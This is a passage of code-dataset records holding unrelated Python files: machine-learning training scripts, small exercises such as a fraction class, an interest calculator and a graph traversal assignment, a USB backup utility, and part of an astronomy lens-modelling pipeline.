It is defined as: Recall = TP / (TP + FN)\n #F1 score reaches its best value at 1 (perfect precision and recall) and worst at 0.\n\n\n#===========================================Log Loss========================================\nlog_loss = log_loss(y_test, yhat_prob)\nprint(log_loss)\n\n\n# #=======================SAMPLE MODEL USING DIFFERENT LOGISTIC REGRESSION PARAMETERS========================\n# LR2 = LogisticRegression(C=0.01, solver='sag').fit(X_train, y_train)\n# yhat_prob2 = LR2.predict_proba(X_test)\n# print (\"LogLoss for sample parameter: %.2f\" % log_loss(y_test, yhat_prob2))\n\n\n","sub_path":"LR.py","file_name":"LR.py","file_ext":"py","file_size_in_byte":5802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"72813381","text":"# -*- coding: utf-8 -*-\nimport argparse\nimport custom_sugartensor as tf\nimport helper_ops\nfrom twitter_data_large import TwitterDataFeeder\n\n# Note: modified from https://github.com/buriburisuri/ByteNet\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"corpus\")\nparser.add_argument(\"datapath\")\nargs = parser.parse_args()\n\n# set log level to debug\ntf.sg_verbosity(10)\n\n\n#\n# hyper parameters\n#\n\nbatch_size = 24 # batch size\nlatent_dim = 800 # hidden layer dimension\ngc_latent_dim = 800 # dimension of conditional embedding\nnum_blocks = 3 # dilated blocks\nuse_conditional_gate = True\nuse_l2_norm = False\nconcat_embedding = True\n\n#\n# inputs\n#\n\nsess = tf.Session(config=tf.ConfigProto(\n intra_op_parallelism_threads=4))\n\n# ComTrans parallel corpus input tensor ( with QueueRunner )\nif args.corpus == \"twitter\":\n data = TwitterDataFeeder(batch_size=batch_size, path = args.datapath, sess = sess)\nelse:\n raise Exception(\"That corpus isn't permitted.\")\n\n# source, target sentence\nx, y, conditionals_x, conditionals_y = data.source, data.target, data.src_cond, data.tgt_cond\n\n\nvoca_size = data.voca_size\n\n#conditional_size = data.cond_size # this is the number of cardinal conditionals, for example if 377 is the highest speaker id\n\n# TODO: this is for conditioning on speaker also\n#emb_conditional = tf.sg_emb(name='emb_cond', voca_size=conditional_size, dim=gc_latent_dim)\n# make embedding matrix for source and target\nemb_x = tf.sg_emb(name='emb_x', voca_size=voca_size, dim=latent_dim)\nemb_y = tf.sg_emb(name='emb_y', voca_size=voca_size, dim=latent_dim)\n\n# shift target for training source\ny_src = tf.concat(axis=1, values=[tf.zeros((batch_size, 1), tf.sg_intx), y[:, :-1]])\n\n# residual block\n@tf.sg_sugar_func\ndef sg_res_block(tensor, opt):\n # default rate\n opt += tf.sg_opt(size=3, rate=1, causal=False, is_first=False)\n\n # input dimension\n in_dim = tensor.get_shape().as_list()[-1]\n\n # reduce dimension\n with tf.sg_context(name='block_%d_%d' % (opt.block, opt.rate)):\n input_ = (tensor\n .sg_bypass(act='relu', ln=(not opt.is_first), name='bypass')\n .sg_conv1d(size=1, dim=in_dim/2, act='relu', ln=True))\n\n # 1xk conv dilated\n if opt.conditional is not None:\n out = input_.sg_aconv1d(size=opt.size, rate=opt.rate, causal=opt.causal, ln=True, name='aconv')\n out1 = out + opt.conditional.sg_conv1d(size=1, stride=1, in_dim=gc_latent_dim, dim=in_dim/2, pad=\"SAME\", bias=False)\n out2 = out + opt.conditional.sg_conv1d(size=1, stride=1, in_dim=gc_latent_dim, dim=in_dim/2, pad=\"SAME\", bias=False)\n out = out1.sg_tanh() * out2.sg_sigmoid()\n else:\n out = input_.sg_aconv1d(size=opt.size, rate=opt.rate, causal=opt.causal, ln=True, name='aconv', 
act='relu')\n\n # dimension recover and residual connection\n out = out.sg_conv1d(size=1, dim=in_dim, name='conv_out') + tensor\n\n return out\n\n# inject residual multiplicative block\ntf.sg_inject_func(sg_res_block)\n\n\n#\n# encode graph ( atrous convolution )\n#\n\n# embed table lookup\nenc = x.sg_lookup(emb=emb_x)\n# loop dilated conv block\nfor i in range(num_blocks):\n enc = (enc\n .sg_res_block(size=5, block=i, rate=1, is_first=True)\n .sg_res_block(size=5, block=i, rate=2)\n .sg_res_block(size=5, block=i, rate=4)\n .sg_res_block(size=5, block=i, rate=8)\n .sg_res_block(size=5, block=i, rate=16))\n\n\n# concat merge target source\nif concat_embedding:\n dec = enc.sg_concat(target=y_src.sg_lookup(emb=emb_y))\nelse:\n dec = y_src.sg_lookup(emb=emb_y)\n\nif use_conditional_gate:\n in_dim = enc.get_shape().as_list()[-1]\n enc = enc.sg_conv1d(size=1, in_dim=in_dim, dim=gc_latent_dim, act='relu')\nelse:\n enc = None\n\n#\n# decode graph ( causal convolution )\n#\n\n# loop dilated causal conv block\nfor i in range(num_blocks):\n dec = (dec\n .sg_res_block(size=3, rate=1, block=i, causal=True, conditional=enc, is_first=True)\n .sg_res_block(size=3, rate=2,block=i, causal=True, conditional=enc)\n .sg_res_block(size=3, rate=4, block=i, causal=True, conditional=enc)\n .sg_res_block(size=3, rate=8, block=i, causal=True, conditional=enc)\n .sg_res_block(size=3, rate=16, block=i, causal=True, conditional=enc))\n\n# final fully convolution layer for softmax\ndec = dec.sg_conv1d(size=1, dim=data.voca_size, name='conv_final')\n\n# cross entropy loss with logit and mask\nloss = dec.sg_ce(target=y, mask=True)\n\nif use_l2_norm:\n l2_loss = tf.add_n([tf.nn.l1_loss(v) for v in tf.trainable_variables() if '/b:' not in v.name])\n tf.sg_summary_loss(l2_loss, prefix='l2_loss')\n loss += .00001 * l2_loss\n tf.sg_summary_loss(loss, prefix='total_loss')\n\n# train\ndata.launch_data_threads()\n\ntf.sg_init(sess)\n\norig_sources = [\nu\"Hello!\",\nu\"How are you?\",\nu\"What's your name?\",\nu\"When were you born?\",\nu\"What year were you born?\",\nu\"Where are you from?\",\nu\"Are you a man or a woman?\",\nu\"See you later.\",\nu\"Why are we here?\",\nu\"Okay, bye!\",\nu\"My name is David. What is my name?\",\nu\"My name is John. 
What is my name?\",\nu\"Are you a leader or a follower?\",\nu\"Are you a follower or a leader?\",\nu\"Is sky blue or black?\",\nu\"Does a cat have a tail?\",\nu\"Does a cat have a wing?\",\nu\"Can a cat fly?\",\nu\"How many legs does a cat have?\",\nu\"How many legs does a spider have?\",\nu\"How many legs does a centipede have?\",\nu\"What is the color of the sky?\",\nu\"What is the purpose of life?\",\nu\"What is the purpose of living?\",\nu\"What is the purpose of existence?\",\nu\"Where are you now?\",\nu\"What is the purpose of dying?\",\nu\"What is the purpose of being intelligent?\",\nu\"What is the purpose of emotions?\",\nu\"What is moral?\",\nu\"What is immoral?\",\nu\"What is morality?\",\nu\"What do you think about tesla?\",\nu\"What do you think about bill gates?\",\nu\"What do you think about England?\",\nu\"What is your job?\",\nu\"What do you do?\",\nu\"The sky is quite blue.\",\nu\"The grass is very green.\",\nu\"Aunt Jamima would disapprove.\",\nu\"It's cold outside.\",\nu\"That was really tasty.\",\nu\"Eureka!\",\nu\"I've discovered something awesome.\",\nu\"I'm thirsty.\",\nu\"I'm hungry.\",\nu\"I feel sad.\",\nu\"I feel happy.\",\nu\"They're not nice people.\",\nu\"They're nice people.\"\n]\n\ntf.sg_train(sess=sess, optim='Adam', log_interval=2000, lr=0.00005, loss=loss,\n ep_size=data.num_batch, max_ep=10, early_stop=False, lr_reset=False,\n validation_op = helper_ops.validation_op, val_label=dec, val_batches=data.to_batches([orig_src.lower() for orig_src in orig_sources]), x=x, y_src=y_src, data=data)\n\ndata.cleanup_tensorflow_stuff()\n","sub_path":"custom_training_experiment_test2.py","file_name":"custom_training_experiment_test2.py","file_ext":"py","file_size_in_byte":6575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"492837477","text":"import math\nclass Ulamek():\n def __init__(self, licznik, mianownik):\n self.licznik=licznik\n self.mianownik=mianownik\n def show(self):\n print('Twój ułamek to: {}/{}'.format(self.licznik,self.mianownik))\n def uproszczony(self):\n nwd=math.gcd(self.licznik,self.mianownik)\n licznik=int(self.licznik/nwd)\n mianownik=int(self.mianownik/nwd)\n if licznik!=self.licznik:\n print('Twój ułamek uproszczony to: {}/{}'.format(licznik,mianownik))\nulamek=Ulamek(2,4)\nulamek.show()\nulamek.uproszczony()","sub_path":"06-ClassesAndObjects/zad. 17.py","file_name":"zad. 
17.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"323273577","text":"# -*- coding: utf-8 -*-\r\n\r\n''' print a document\r\n'''\r\n\r\nimport argparse\r\nimport pathlib\r\n\r\nimport shutil\r\n\r\nusbPath = '/Volumes/台电酷闪/'\r\nparser = argparse.ArgumentParser(description='Back up documents')\r\nparser.add_argument('-s', action='store', dest='src', metavar='SRC', required=True)\r\nparser.add_argument('-d', action='store', dest='dst', metavar='DST')\r\nparser.add_argument('-i', action='store', dest='ignore', nargs='*', metavar='IGNORE')\r\nparser.add_argument('-u', action='store', dest='usbPath', metavar='USB_PATH', default=usbPath)\r\n\r\n\r\nargs = parser.parse_args()\r\nsrc = pathlib.Path('~', args.src).expenduser()\r\nif args.dst:\r\n dst = pathlib.Path(args.usbPath, args.dst)\r\nelse:\r\n dst = pathlib.Path(args.usbPath, args.src)\r\n\r\nif dst.exists():\r\n shutil.rmtree(dst)\r\n\r\nif args.ignore:\r\n shutil.copytree(src, dst, ignore=shutil.ignore_patterns(*args.ignore))\r\nelse:\r\n shutil.copytree(src, dst)","sub_path":"backup.py","file_name":"backup.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"418245522","text":"\"\"\"\nProgram Name: Assignment #12 Calculating Interest\nProgrammer: Hyun Wook Kim\nDate: 2018.06.29\nDescription:\n단리를 계산하는 프로그램을 작성하라. 원금을 입력 받은 다음 이자를\n퍼센트 단위로 입력받고, 기간을 연단위로 입력 받은 후 원리금\n(원금 + 이자)를 출력하보자.\n원리금 = 원금 * (1 + 연이율 * 기간(연단위))\n\"\"\"\n\nif __name__ == '__main__':\n principal = int(input(\"Enter the principal: \"))\n rate = float(input(\"Enter the rate of interest: \"))\n year = int(input(\"Enter the number of years: \"))\n\n print(\"After %d years at %.1lf%%. 
the invest will be worth $%d\"\n % (year, rate, principal * (1 + rate * 0.01 * year)))\n","sub_path":"Taco101_Python/Assignment/assignment12.py","file_name":"assignment12.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"77739364","text":"# File: Graph.py\r\n\r\n# Description: different graph functions\r\n\r\n# Student Name: Raymond Li\r\n\r\n# Student UT EID: rll2497 \r\n\r\n# Partner Name: Kevin Huang\r\n\r\n# Partner UT EID: kjh2755\r\n\r\n# Course Name: CS 313E\r\n\r\n# Unique Number: 50205\r\n\r\n# Date Created: 11/24/19\r\n\r\n# Date Last Modified: 11/25/19\r\nclass Stack (object):\r\n def __init__ (self):\r\n self.stack = []\r\n\r\n # add an item to the top of the stack\r\n def push (self, item):\r\n self.stack.append (item)\r\n\r\n # remove an item from the top of the stack\r\n def pop (self):\r\n return self.stack.pop()\r\n\r\n # check the item on the top of the stack\r\n def peek (self):\r\n return self.stack[-1]\r\n\r\n # check if the stack is empty\r\n def is_empty (self):\r\n return (len (self.stack) == 0)\r\n\r\n # return the number of elements in the stack\r\n def size (self):\r\n return (len (self.stack))\r\n\r\nclass Queue (object):\r\n def __init__ (self):\r\n self.queue = []\r\n\r\n # add an item to the end of the queue\r\n def enqueue (self, item):\r\n self.queue.append (item)\r\n\r\n # remove an item from the beginning of the queue\r\n def dequeue (self):\r\n return (self.queue.pop(0))\r\n\r\n # check if the queue is empty\r\n def is_empty (self):\r\n return (len (self.queue) == 0)\r\n\r\n # return the size of the queue\r\n def size (self):\r\n return (len (self.queue))\r\n\r\nclass Vertex(object):\r\n def __init__(self,label):\r\n self.label = label\r\n self.visited = False\r\n\r\n def was_visited(self):\r\n return self.visited\r\n\r\n def get_label(self):\r\n return self.label\r\n\r\n def __str__(self):\r\n return str(self.label)\r\n\r\nclass Graph(object):\r\n def __init__(self):\r\n self.vertices = []\r\n self.adjMat = []\r\n\r\n # return True if a vertex with this label exists (the early else branch\r\n # previously made this return after checking only the first vertex)\r\n def has_vertex(self,label):\r\n numVertex = len(self.vertices)\r\n for i in range(numVertex):\r\n if (label == (self.vertices[i]).get_label()):\r\n return True\r\n return False\r\n\r\n def get_index(self,label):\r\n numVertex = len(self.vertices)\r\n for i in range (numVertex):\r\n if (label == (self.vertices[i]).get_label()):\r\n return i\r\n return -1\r\n\r\n def add_vertex(self,label):\r\n if (not self.has_vertex(label)):\r\n self.vertices.append(Vertex(label))\r\n #add column to adjacency matrix\r\n numVertex = len(self.vertices)\r\n for i in range(numVertex-1):\r\n self.adjMat[i].append(0)\r\n #add a new row for the new vertex\r\n new_row = []\r\n for i in range(numVertex):\r\n new_row.append(0)\r\n self.adjMat.append(new_row)\r\n\r\n #add weighted directed edge to graph\r\n def add_directed_edge(self, start, finish, weight = 1):\r\n self.adjMat[start][finish] = weight\r\n\r\n #add weighted undirected edge to graph\r\n def add_undirected_edge(self, start, finish, weight = 1):\r\n self.adjMat[start][finish] = weight\r\n self.adjMat[finish][start] = weight\r\n\r\n #get edge weight between two vertices, return -1 if edge does not exist\r\n def get_edge_weight (self, fromVertexLabel, toVertexLabel):\r\n fromVertex = self.get_index(fromVertexLabel)\r\n toVertex = self.get_index(toVertexLabel)\r\n if (self.adjMat[fromVertex][toVertex] != 0):\r\n edgeWeight = self.adjMat[fromVertex][toVertex]\r\n return edgeWeight\r\n else:\r\n 
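 # no edge is stored between these vertices (adjMat holds 0 for "no edge"),
 # so fall through to the sentinel value promised in the comment above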
return -1\r\n \r\n # get a list of immediate neighbors that you can go to from a vertex\r\n # return empty list if there are none\r\n def get_neighbors (self, vertexLabel):\r\n numVertex = len(self.vertices)\r\n neighbors = []\r\n for i in range(numVertex):\r\n if (self.adjMat[self.get_index(vertexLabel)][i] > 0):\r\n neighbors.append((self.vertices[i].label))\r\n return neighbors\r\n\r\n\r\n #return an unvisited vertex adjacent to vertex v(index)\r\n def get_adj_unvisited_vertex(self, v):\r\n numVertex = len(self.vertices)\r\n for i in range(numVertex):\r\n if (self.adjMat[v][i] > 0) and (not (self.vertices[i]).was_visited()):\r\n return i\r\n return -1 \r\n # get a copy of the list of Vertex objects\r\n def getVertices(self):\r\n vertexCopy = []\r\n numVertex = len(self.vertices)\r\n for i in range(numVertex):\r\n vertexCopy.append((self.vertices[i].label))\r\n return vertexCopy\r\n\r\n # do a depth first search in a graph starting at vertex v (index)\r\n def dfs (self, v):\r\n #create a stack\r\n theStack = Stack()\r\n #mark the vertex v as visited and push it on the Stack\r\n (self.vertices[v]).visited = True\r\n print(self.vertices[v])\r\n theStack.push(v)\r\n\r\n #visit all other vertices according to depth \r\n while (not theStack.is_empty()):\r\n #get and adjacent unvisited vertex\r\n u = self.get_adj_unvisited_vertex(theStack.peek())\r\n if (u == -1):\r\n u = theStack.pop()\r\n else:\r\n (self.vertices[u]).visited = True\r\n print(self.vertices[u])\r\n theStack.push(u)\r\n #the stack is empty, let us reset the flags\r\n numVertex = len(self.vertices)\r\n for i in range(numVertex):\r\n self.vertices[i].visited = False\r\n\r\n #breadth first search\r\n def bfs(self,v):\r\n #create a queue\r\n theQueue = Queue()\r\n #mark the vertex v as visited and enqueue it\r\n self.vertices[v].visited = True\r\n theQueue.enqueue(v)\r\n #go through other vertices\r\n while (theQueue.is_empty() == False):\r\n queueSize = theQueue.size()\r\n for i in range(queueSize):\r\n ans = theQueue.dequeue()\r\n print(self.vertices[ans])\r\n x = self.get_adj_unvisited_vertex(ans)\r\n while (x != -1):\r\n theQueue.enqueue(x)\r\n self.vertices[x].visited = True\r\n x = self.get_adj_unvisited_vertex(ans)\r\n #queue is empty, reset flags\r\n numVertex = len(self.vertices)\r\n for i in range(numVertex):\r\n self.vertices[i].visited = False \r\n return \r\n\r\n # delete an edge from the adjacency matrix\r\n # delete a single edge if the graph is directed\r\n # delete two edges if the graph is undirected\r\n def delete_edge(self, fromVertexLabel, toVertexLabel):\r\n fromVertex = None\r\n toVertex = None\r\n numVertex = len(self.vertices)\r\n for i in range(numVertex):\r\n if self.vertices[i].label == fromVertexLabel:\r\n fromVertex = i\r\n if self.vertices[i].label == toVertexLabel:\r\n toVertex = i\r\n if (fromVertex != None and toVertex != None):\r\n self.adjMat[fromVertex][toVertex] = 0\r\n self.adjMat[toVertex][fromVertex] = 0\r\n \r\n # delete a vertex from the vertex list and all edges from and\r\n # to it in the adjacency matrix\r\n def delete_vertex (self, vertexLabel):\r\n #locate the vertexLabel index\r\n vertexIndex = self.get_index(vertexLabel)\r\n #delete from vertex list\r\n self.vertices.pop(vertexIndex)\r\n #delete from adjacency matrix\r\n del self.adjMat[vertexIndex]\r\n #delete edges\r\n for i in range(len(self.adjMat)):\r\n del self.adjMat[i][vertexIndex]\r\n\r\ndef main():\r\n # create the Graph object\r\n cities = Graph()\r\n\r\n # oepn the file for reading\r\n in_file = open (\"./graph.txt\", 
\"r\")\r\n\r\n # read the number of vertices\r\n num_vertices = int ((in_file.readline()).strip())\r\n \r\n # read all the Vertices and add them the Graph\r\n for i in range (num_vertices):\r\n city = (in_file.readline()).strip()\r\n cities.add_vertex (city)\r\n\r\n # read the number of edges\r\n num_edges = int ((in_file.readline()).strip())\r\n \r\n # read the edges and add them to the adjacency matrix\r\n for i in range (num_edges):\r\n edge = (in_file.readline()).strip()\r\n edge = edge.split()\r\n start = int (edge[0])\r\n finish = int (edge[1])\r\n weight = int (edge[2])\r\n cities.add_directed_edge (start, finish, weight)\r\n\r\n # read the starting vertex fro dfs and bfs\r\n start_vertex = (in_file.readline()).strip()\r\n #print (start_vertex)\r\n\r\n # get the index of the starting vertex\r\n start_index = cities.get_index (start_vertex)\r\n #print (start_index)\r\n\r\n # do the depth first search\r\n print (\"\\nDepth First Search from \" + start_vertex)\r\n cities.dfs (start_index)\r\n\r\n #do breadth first search in a graph\r\n print(\"\\nBreadth First Search from \" + start_vertex)\r\n cities.bfs(start_index)\r\n\r\n #deletion of an edge\r\n delEdge = in_file.readline().strip()\r\n delEdge = delEdge.split()\r\n #print(delEdge)\r\n print(\"\\nDeletion of an edge\")\r\n cities.delete_edge(delEdge[0],delEdge[1])\r\n\r\n # print the adjacency matrix\r\n print (\"\\nAdjacency Matrix\")\r\n for i in range (num_vertices):\r\n for j in range (num_vertices):\r\n print (cities.adjMat[i][j], end = \" \")\r\n print ()\r\n print ()\r\n\r\n #deletion of a vertex\r\n print(\"Deletion of a vertex\")\r\n delVertex = in_file.readline().strip()\r\n delVertex = delVertex.split()\r\n #print(delVertex)\r\n cities.delete_vertex(delVertex[0])\r\n\r\n #print the vertices (cities)\r\n print(\"\\nList of Vertices\")\r\n for i in cities.vertices:\r\n print(i)\r\n \r\n # print the adjacency matrix\r\n print (\"\\nAdjacency Matrix\")\r\n for i in range (num_vertices-1):\r\n for j in range (num_vertices-1):\r\n print (cities.adjMat[i][j], end = \" \")\r\n print ()\r\n print ()\r\n\r\n #close file\r\n in_file.close()\r\n\r\nmain() \r\n ","sub_path":"Graph.py","file_name":"Graph.py","file_ext":"py","file_size_in_byte":9868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"115374229","text":"import autofit as af\nimport autogalaxy as ag\nfrom autoconf import conf\nfrom autolens.pipeline import setup\n\n\nclass SLaM:\n def __init__(self, folders=None, hyper=None, source=None, light=None, mass=None):\n\n self.folders = folders\n self.hyper = hyper\n self.source = source\n self.light = light\n self.mass = mass\n self.mass.disk_as_sersic = self.light.disk_as_sersic\n\n def set_source_type(self, source_type):\n\n self.source.type_tag = source_type\n\n def set_light_type(self, light_type):\n\n self.light.type_tag = light_type\n\n def set_mass_type(self, mass_type):\n\n self.mass.type_tag = mass_type\n\n @property\n def source_pipeline_tag(self):\n return conf.instance.tag.get(\"pipeline\", \"pipeline\", str) + self.hyper.hyper_tag\n\n @property\n def lens_light_tag_for_source_pipeline(self):\n \"\"\"Return the lens light tag in a *Source* pipeline, where the lens light is set depending on the source\n initialize pipeline that was used.\"\"\"\n\n if self.light.type_tag is None:\n return \"\"\n\n light_tag = conf.instance.tag.get(\"pipeline\", \"light\", str)\n return \"__\" + light_tag + \"_\" + self.light.type_tag\n\n def 
lens_from_light_pipeline_for_mass_pipeline(self, redshift_lens, mass, shear):\n \"\"\"Setup the lens model for a Mass pipeline using the previous pipeline and phase results.\n\n The lens light model is not specified by the Mass pipeline, so the Light pipelines are used to\n determine this. This function returns a _GalaxyModel_ for the lens, where:\n\n 1) The lens light model uses the light model of the Light pipeline.\n 2) The lens light is returned as a model if *fix_lens_light* is *False, an instance if *True*.\n\n Parameters\n ----------\n redshift_lens : float\n The redshift of the lens galaxy.\n mass : ag.MassProfile\n The mass model of the len galaxy.\n shear : ag.ExternalShear\n The external shear of the lens galaxy.\n \"\"\"\n\n if self.mass.fix_lens_light:\n\n return ag.GalaxyModel(\n redshift=redshift_lens,\n bulge=af.last.instance.galaxies.lens.bulge,\n disk=af.last.instance.galaxies.lens.disk,\n mass=mass,\n shear=shear,\n hyper_galaxy=af.last.hyper_combined.instance.optional.galaxies.lens.hyper_galaxy,\n )\n\n else:\n\n return ag.GalaxyModel(\n redshift=redshift_lens,\n bulge=af.last.model.galaxies.lens.bulge,\n disk=af.last.model.galaxies.lens.disk,\n mass=mass,\n shear=shear,\n hyper_galaxy=af.last.hyper_combined.instance.optional.galaxies.lens.hyper_galaxy,\n )\n\n def source_from_source_pipeline_for_light_pipeline(self):\n \"\"\"Setup the source model for a Light pipeline using the previous pipeline and phase results.\n\n The source light model is not specified by the Light pipeline, so the Source pipelines are used to \n determine whether the source model is parametric or an inversion. This behaviour can be customized in SLaM \n pipelines by replacing this method with the *source_from_previous_pipeline_model_or_instance* method of the \n SLaM class.\n \n The source is returned as an instance for the Light pipeline, irrespective of whether it is parametric or an\n Inversion. This is because this phase fits the lens light, and thus does not depend strongly on the source.\n \"\"\"\n return self.source_from_previous_pipeline_model_or_instance(\n source_as_model=False, index=0\n )\n\n def source_from_source_pipeline_for_mass_pipeline(self):\n \"\"\"Setup the source model for a Mass pipeline using the previous pipeline and phase results.\n\n The source light model is not specified by the pipeline Mass pipeline (e.g. the previous pipelines are used to \n determine whether the source model is parametric or an inversion.\n\n The source is returned as a model if it is parametric (given it must be updated to properly compute a new mass\n model) whereas inversions are returned as an instance (as they have sufficient flexibility to typically not\n required updating). This behaviour can be customized in SLaM pipelines by replacing this method with the\n *source_from_previous_pipeline_model_or_instance* method of the SLaM class.\n \"\"\"\n if self.source.type_tag in \"sersic\":\n return self.source_from_previous_pipeline_model_or_instance(\n source_as_model=True, index=0\n )\n else:\n return self.source_from_previous_pipeline_model_or_instance(\n source_as_model=False, index=0\n )\n\n def source_from_previous_pipeline_model_or_instance(\n self, source_as_model=False, index=0\n ):\n \"\"\"Setup the source model using the previous pipeline and phase results.\n\n The source light model is not specified by the pipeline light and mass pipelines (e.g. 
the previous pipelines\n are used to determine whether the source model is parametric or an inversion).\n\n The source can be returned as an instance or a model, depending on the optional input. The default SLaM p\n ipelines return parametric sources as a model (give they must be updated to properly compute a new mass model)\n and return inversions as an instance (as they have sufficient flexibility to typically not required updating).\n They use the *source_from_pevious_pipeline* method of the SLaM class to do this.\n\n The pipeline tool af.last is required to locate the previous source model, which requires an index based on the\n pipelines that have run. For example, if the source model you wish to load from is 3 phases back (perhaps\n because there were multiple phases in a Light pipeline preivously) this index should be 2.\n\n Parameters\n ----------\n source_as_model : bool\n If *True* the source is returned as a *model* where the parameters are fitted for using priors of the\n phase result it is loaded from. If *False*, it is an instance of that phase's result.\n index : integer\n The index (counting backwards from this phase) of the phase result used to setup the source.\n \"\"\"\n\n if self.hyper.hyper_galaxies:\n\n hyper_galaxy = af.PriorModel(ag.HyperGalaxy)\n\n hyper_galaxy.noise_factor = (\n af.last.hyper_combined.model.galaxies.source.hyper_galaxy.noise_factor\n )\n hyper_galaxy.contribution_factor = (\n af.last.hyper_combined.instance.optional.galaxies.source.hyper_galaxy.contribution_factor\n )\n hyper_galaxy.noise_power = (\n af.last.hyper_combined.instance.optional.galaxies.source.hyper_galaxy.noise_power\n )\n\n else:\n\n hyper_galaxy = None\n\n if self.source.type_tag in \"sersic\":\n\n if source_as_model:\n\n return ag.GalaxyModel(\n redshift=af.last[index].model.galaxies.source.redshift,\n sersic=af.last[index].model.galaxies.source.sersic,\n hyper_galaxy=hyper_galaxy,\n )\n\n else:\n\n return ag.GalaxyModel(\n redshift=af.last[index].instance.galaxies.source.redshift,\n sersic=af.last[index].instance.galaxies.source.sersic,\n hyper_galaxy=hyper_galaxy,\n )\n\n else:\n\n if source_as_model:\n\n return ag.GalaxyModel(\n redshift=af.last.instance.galaxies.source.redshift,\n pixelization=af.last.hyper_combined.instance.galaxies.source.pixelization,\n regularization=af.last.hyper_combined.model.galaxies.source.regularization,\n )\n\n else:\n\n return ag.GalaxyModel(\n redshift=af.last.instance.galaxies.source.redshift,\n pixelization=af.last[\n index\n ].hyper_combined.instance.galaxies.source.pixelization,\n regularization=af.last[\n index\n ].hyper_combined.instance.galaxies.source.regularization,\n hyper_galaxy=hyper_galaxy,\n )\n\n\nclass SLaMHyper(setup.SetupPipeline):\n def __init__(\n self,\n hyper_galaxies=False,\n hyper_image_sky=False,\n hyper_background_noise=False,\n hyper_fixed_after_source=False,\n hyper_galaxies_search=None,\n inversion_search=None,\n hyper_combined_search=None,\n evidence_tolerance=None,\n ):\n \"\"\"The setup of a pipeline, which controls how PyAutoLens template pipelines runs, for example controlling\n assumptions about the lens's light profile bulge-disk model or if shear is included in the mass model.\n\n Users can write their own pipelines which do not use or require the *SetupPipeline* class.\n\n This class enables pipeline tagging, whereby the setup of the pipeline is used in the template pipeline\n scripts to tag the output path of the results depending on the setup parameters. 
This allows one to fit\n different models to a dataset in a structured path format.\n\n Parameters\n ----------\n hyper_galaxies : bool\n If a hyper-pipeline is being used, this determines if hyper-galaxy functionality is used to scale the\n noise-map of the dataset throughout the fitting.\n hyper_image_sky : bool\n If a hyper-pipeline is being used, this determines if hyper-galaxy functionality is used include the\n image's background sky component in the model.\n hyper_background_noise : bool\n If a hyper-pipeline is being used, this determines if hyper-galaxy functionality is used include the\n noise-map's background component in the model.\n hyper_fixed_after_source : bool\n If, after the Source pipeline, the hyper parameters are fixed and thus no longer reopitmized using new\n mass models.\n \"\"\"\n\n super().__init__(\n hyper_galaxies=hyper_galaxies,\n hyper_image_sky=hyper_image_sky,\n hyper_background_noise=hyper_background_noise,\n hyper_galaxies_search=hyper_galaxies_search,\n inversion_search=inversion_search,\n hyper_combined_search=hyper_combined_search,\n evidence_tolerance=evidence_tolerance,\n )\n\n self.hyper_fixed_after_source = hyper_fixed_after_source\n\n @property\n def tag(self):\n return (\n conf.instance.tag.get(\"pipeline\", \"pipeline\", str)\n + self.hyper_tag\n + self.hyper_fixed_after_source_tag\n )\n\n @property\n def hyper_tag(self):\n \"\"\"Tag ithe hyper pipeline features used in a hyper pipeline to customize pipeline output paths.\n \"\"\"\n if not any(\n [self.hyper_galaxies, self.hyper_image_sky, self.hyper_background_noise]\n ):\n return \"\"\n\n return (\n \"__\"\n + conf.instance.tag.get(\"pipeline\", \"hyper\", str)\n + self.hyper_galaxies_tag\n + self.hyper_image_sky_tag\n + self.hyper_background_noise_tag\n + self.hyper_fixed_after_source_tag\n )\n\n @property\n def hyper_fixed_after_source_tag(self):\n \"\"\"Generate a tag for if the hyper parameters are held fixed after the source pipeline.\n\n This changes the pipeline setup tag as follows:\n\n hyper_fixed_after_source = False -> setup\n hyper_fixed_after_source = True -> setup__hyper_fixed\n \"\"\"\n if not self.hyper_fixed_after_source:\n return \"\"\n elif self.hyper_fixed_after_source:\n return \"_\" + conf.instance.tag.get(\n \"pipeline\", \"hyper_fixed_after_source\", str\n )\n\n\nclass SLaMSource(setup.SetupPipeline):\n def __init__(\n self,\n pixelization=None,\n regularization=None,\n inversion_pixels_fixed=None,\n no_shear=False,\n lens_light_centre=None,\n lens_mass_centre=None,\n align_light_mass_centre=False,\n lens_light_bulge_only=False,\n number_of_gaussians=None,\n ):\n\n super().__init__(\n pixelization=pixelization,\n regularization=regularization,\n inversion_pixels_fixed=inversion_pixels_fixed,\n no_shear=no_shear,\n lens_light_centre=lens_light_centre,\n lens_mass_centre=lens_mass_centre,\n number_of_gaussians=number_of_gaussians,\n align_light_mass_centre=align_light_mass_centre,\n )\n\n self.lens_light_bulge_only = lens_light_bulge_only\n self.type_tag = None\n\n @property\n def tag(self):\n return (\n conf.instance.tag.get(\"pipeline\", \"source\", str)\n + \"__\"\n + self.type_tag\n + self.number_of_gaussians_tag\n + self.no_shear_tag\n + self.lens_light_centre_tag\n + self.lens_mass_centre_tag\n + self.align_light_mass_centre_tag\n + self.lens_light_bulge_only_tag\n )\n\n @property\n def lens_light_bulge_only_tag(self):\n \"\"\"Generate a tag for if the lens light of the pipeline and / or phase are fixed to a previous estimate, or\n varied during he analysis, to 
